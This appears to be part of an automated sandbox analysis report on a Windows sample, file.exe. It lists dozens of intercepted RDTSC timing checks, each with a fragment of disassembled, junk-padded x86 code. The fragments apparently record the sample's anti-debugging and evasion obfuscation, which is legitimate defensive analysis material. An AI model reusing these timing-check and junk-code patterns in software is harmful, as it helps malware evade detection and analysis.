                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127565 second address: 11275D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 mov dword ptr [ebp+122D1C51h], ecx 0x0000000f push 00000000h 0x00000011 mov dword ptr [ebp+122D2BC9h], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F0DED622D78h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Dh 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 mov dword ptr [ebp+122DB34Fh], eax 0x00000039 mov di, bx 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 jmp 00007F0DED622D89h 0x00000045 jl 00007F0DED622D76h 0x0000004b popad 0x0000004c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11275D0 second address: 11275D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11275D6 second address: 11275DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11275DA second address: 11275DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1128F1D second address: 1128F23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1129530 second address: 11295C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jl 00007F0DECD24166h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], eax 0x00000011 mov edi, dword ptr [ebp+122D1A35h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007F0DECD24168h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 xor esi, dword ptr [ebp+122D2B52h] 0x00000039 mov edi, dword ptr [ebp+122D36BFh] 0x0000003f mov edi, dword ptr [ebp+12459AA6h] 0x00000045 push 00000000h 0x00000047 push 00000000h 0x00000049 push ecx 0x0000004a call 00007F0DECD24168h 0x0000004f pop ecx 0x00000050 mov dword ptr [esp+04h], ecx 0x00000054 add dword ptr [esp+04h], 0000001Ch 0x0000005c inc ecx 0x0000005d push ecx 0x0000005e ret 0x0000005f pop ecx 0x00000060 ret 0x00000061 mov edi, ebx 0x00000063 and esi, 24D40553h 0x00000069 push eax 0x0000006a push eax 0x0000006b push edx 0x0000006c je 00007F0DECD24171h 0x00000072 jmp 00007F0DECD2416Bh 0x00000077 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133957 second address: 113396C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DED622D7Ch 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113396C second address: 11339DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24173h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F0DECD24168h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 xor edi, dword ptr [ebp+124597D3h] 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+122D1CCDh], eax 0x00000033 push 00000000h 0x00000035 jmp 00007F0DECD24177h 0x0000003a xchg eax, esi 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007F0DECD2416Ah 0x00000042 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134933 second address: 11349CE instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007F0DED622D76h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jl 00007F0DED622D84h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F0DED622D78h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e jmp 00007F0DED622D7Fh 0x00000033 push 00000000h 0x00000035 sub edi, dword ptr [ebp+122D1C5Bh] 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F0DED622D78h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000017h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 xchg eax, esi 0x00000058 pushad 0x00000059 jne 00007F0DED622D86h 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 pop eax 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113597B second address: 1135989 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1139ECC second address: 1139ED0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AD7E second address: 113AD82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1127D64 second address: 1127D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AD82 second address: 113AD97 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jnl 00007F0DECD24168h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCBD second address: 113BCC3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B326 second address: 112B32A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112A777 second address: 112A77D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCC3 second address: 113BCC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 112B32A second address: 112B330 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BCC8 second address: 113BD56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F0DECD24173h 0x0000000f nop 0x00000010 adc edi, 1F1ACC5Dh 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push eax 0x0000001b call 00007F0DECD24168h 0x00000020 pop eax 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 add dword ptr [esp+04h], 0000001Ch 0x0000002d inc eax 0x0000002e push eax 0x0000002f ret 0x00000030 pop eax 0x00000031 ret 0x00000032 add bh, 0000000Ah 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push edi 0x0000003a call 00007F0DECD24168h 0x0000003f pop edi 0x00000040 mov dword ptr [esp+04h], edi 0x00000044 add dword ptr [esp+04h], 0000001Ch 0x0000004c inc edi 0x0000004d push edi 0x0000004e ret 0x0000004f pop edi 0x00000050 ret 0x00000051 mov edi, 51050600h 0x00000056 xchg eax, esi 0x00000057 jmp 00007F0DECD2416Eh 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f push esi 0x00000060 push esi 0x00000061 pop esi 0x00000062 pop esi 0x00000063 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CDA0 second address: 113CE46 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push eax 0x0000000d call 00007F0DED622D78h 0x00000012 pop eax 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 add dword ptr [esp+04h], 0000001Dh 0x0000001f inc eax 0x00000020 push eax 0x00000021 ret 0x00000022 pop eax 0x00000023 ret 0x00000024 add bh, 00000044h 0x00000027 push 00000000h 0x00000029 mov ebx, dword ptr [ebp+122D18C7h] 0x0000002f jno 00007F0DED622D86h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F0DED622D78h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000017h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov ebx, ecx 0x00000053 xchg eax, esi 0x00000054 push ebx 0x00000055 jl 00007F0DED622D83h 0x0000005b jmp 00007F0DED622D7Dh 0x00000060 pop ebx 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 jng 00007F0DED622D78h 0x0000006a pushad 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CE46 second address: 113CE50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F0DECD24166h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113CE50 second address: 113CE54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132A81 second address: 1132A9D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24178h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132A9D second address: 1132AA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE84 second address: 113DE88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1133B03 second address: 1133B28 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0DED622D7Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F0DED622D81h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113DE88 second address: 113DEE1 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e adc di, 53B1h 0x00000013 push 00000000h 0x00000015 and edi, dword ptr [ebp+122D3723h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push edi 0x00000020 call 00007F0DECD24168h 0x00000025 pop edi 0x00000026 mov dword ptr [esp+04h], edi 0x0000002a add dword ptr [esp+04h], 00000019h 0x00000032 inc edi 0x00000033 push edi 0x00000034 ret 0x00000035 pop edi 0x00000036 ret 0x00000037 add edi, dword ptr [ebp+122D3563h] 0x0000003d or edi, dword ptr [ebp+122D386Bh] 0x00000043 xchg eax, esi 0x00000044 push eax 0x00000045 push edx 0x00000046 jl 00007F0DECD2416Ch 0x0000004c jno 00007F0DECD24166h 0x00000052 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1132B84 second address: 1132B89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134B06 second address: 1134B29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24174h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F0DECD24166h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114036D second address: 1140376 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134B29 second address: 1134B2F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140376 second address: 1140399 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F0DED622D76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F0DED622D84h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C11 second address: 1135C2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD24170h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d push eax 0x0000000e pop eax 0x0000000f pop edi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1140399 second address: 11403AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DED622D80h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1135C2C second address: 1135C43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0DECD24173h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11403AD second address: 11403CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D87h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1134C07 second address: 1134C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7DD2 second address: 10E7DD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10E7DD8 second address: 10E7DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136D9F second address: 1136DA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1136DA3 second address: 1136DA7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138EAD second address: 1138EB7 instructions: 0x00000000 rdtsc 0x00000002 je 00007F0DED622D76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138EB7 second address: 1138EBC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1138F9A second address: 1138F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113AFD7 second address: 113AFDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BEBE second address: 113BEC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BEC4 second address: 113BECA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BECA second address: 113BECE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BECE second address: 113BED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113BFAE second address: 113BFB8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E06D second address: 113E073 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 113E12B second address: 113E132 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147FE1 second address: 1147FE7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147878 second address: 114787C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114787C second address: 1147894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DECD2416Eh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147894 second address: 114789A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114789A second address: 114789E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1147A0A second address: 1147A28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F0DED622D85h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149810 second address: 1149830 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0DECD24178h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1149830 second address: 1149834 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9B3 second address: 114D9B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9B7 second address: 114D9C1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9C1 second address: 114D9C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9C5 second address: 114D9F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0DED622D84h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jmp 00007F0DED622D7Dh 0x00000012 pop esi 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9F2 second address: 114D9F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114D9F8 second address: 114DA4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a jne 00007F0DED622DA3h 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F0DED622D84h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114DA4D second address: 114DA86 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0DECD24178h 0x00000008 jmp 00007F0DECD24172h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 pop esi 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FC92 second address: 114FCA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F0DED622D76h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jne 00007F0DED622D76h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCA7 second address: 114FCAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCAB second address: 114FCB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F0DED622D76h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCB7 second address: 114FCE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007F0DECD24179h 0x0000000a js 00007F0DECD24166h 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCE5 second address: 114FCE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 114FCE9 second address: 114FCED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155F18 second address: 1155F1C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11553A5 second address: 11553B7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jng 00007F0DECD24166h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11553B7 second address: 11553BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155A8C second address: 1155AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007F0DECD2416Dh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155C1A second address: 1155C1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D63 second address: 1155D85 instructions: 0x00000000 rdtsc 0x00000002 js 00007F0DECD24166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F0DECD24166h 0x00000013 jbe 00007F0DECD24166h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c popad 0x0000001d push edi 0x0000001e push eax 0x0000001f push edx 0x00000020 push esi 0x00000021 pop esi 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D85 second address: 1155D89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1155D89 second address: 1155D8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 115A640 second address: 115A64A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F0DED622D76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159455 second address: 1159459 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159459 second address: 1159465 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1159465 second address: 1159469 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
